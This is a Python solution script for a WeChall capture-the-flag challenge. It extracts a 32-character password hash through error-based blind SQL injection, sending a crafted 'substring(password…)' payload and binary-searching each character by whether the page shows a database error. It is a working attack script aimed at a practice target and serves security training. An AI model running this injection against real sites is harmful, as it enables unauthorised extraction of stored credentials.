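# http://www.wechall.net/challenge/Mawekl/are_you_blind/index.php
#
# This challenge is blind SQL injection again: the secret is a 32-character
# hash and the search below finishes in 128 requests. The true/false signal
# used here is whether the page reports a database error.
#
# Below is the Python code.

#!/usr/bin/env python2
import os

try:  # Python 2, the interpreter named in the shebang
    from urllib import urlencode
    from urllib2 import Request, urlopen
except ImportError:  # Python 3
    from urllib.parse import urlencode
    from urllib.request import Request, urlopen

CHALLENGE_URL = "http://www.wechall.net/challenge/Mawekl/are_you_blind/index.php"
ERROR_MARKER = "Database error"
# The original listing embedded a literal WC session cookie in the request
# header. A session token identifies an account and does not belong in
# published source, so it is read from the environment instead.
SESSION_COOKIE_ENV = "WECHALL_SESSION_COOKIE"
# Without a timeout a single stalled response blocks the whole run.
REQUEST_TIMEOUT_SECONDS = 30


def makePayload(statement):
    """Build the value sent in the ``injection`` form field.

    ``statement`` is ``[position, operator, character]``: the 1-based
    position in ``password``, a comparison operator and the character to
    compare against. All three come from this script, not from outside
    input, and are interpolated as-is.

    The resulting expression evaluates to 3 when the comparison holds.
    Otherwise it evaluates a two-row subquery where a single value is
    expected, which makes the statement fail.

    The signal exists only because the page answers differently when the
    query fails. Binding the ``injection`` field as a query parameter, or
    returning the same page for failed queries, would remove it.
    """
    position, operator, character = statement[0], statement[1], statement[2]
    return "' or if(substring(password,%d,1)%s'%s',3,(select 1 union select 2))=3-- " % (
        position, operator, character)


def checkResponse(response):
    """Return True when the page text carries no database error marker."""
    return ERROR_MARKER not in response


def doAssert(statement):
    """POST one comparison to the challenge page and report the outcome.

    Returns True when the response contains no "Database error" text,
    which is how a comparison that held shows up.

    Raises:
        RuntimeError: if the session cookie environment variable is unset.
    """
    cookie = os.environ.get(SESSION_COOKIE_ENV)
    if not cookie:
        raise RuntimeError(
            "set %s to your own WeChall session cookie" % SESSION_COOKIE_ENV)

    values = {'injection': makePayload(statement), 'inject': 'Inject'}
    # Request bodies must be bytes on Python 3; the encoded form is ASCII.
    data = urlencode(values).encode("ascii")
    req = Request(CHALLENGE_URL, data)
    req.add_header('cookie', cookie)
    response = urlopen(req, timeout=REQUEST_TIMEOUT_SECONDS)
    try:
        # Decode so the substring test works on both Python 2 and 3.
        content = response.read().decode("utf-8", "replace")
    finally:
        response.close()
    return checkResponse(content)


def recoverChar(idx, alphalist, oracle=doAssert):
    """Binary-search ``alphalist`` for the character at 1-based ``idx``.

    ``oracle`` receives ``[idx, '<', candidate]`` and returns True when the
    character sorts before ``candidate``. The search keeps the half-open
    index range [start, end) and halves it on every call, so the
    16-character alphabet costs 4 calls per position.
    """
    start, end = 0, len(alphalist)  # [start, end)
    while end - start > 1:
        # Floor division keeps the index an int on Python 3 as well.
        middle = (start + end) // 2
        if oracle([idx, '<', alphalist[middle]]):
            end = middle
        else:
            start = middle
    return alphalist[start]


if __name__ == "__main__":
    alphalist = "0123456789ABCDEF"
    result = []
    # 32 positions at 4 requests each gives the 128 requests quoted above.
    for idx in range(1, 33):
        found = recoverChar(idx, alphalist)
        result.append(found)
        print(found)
    print(''.join(result))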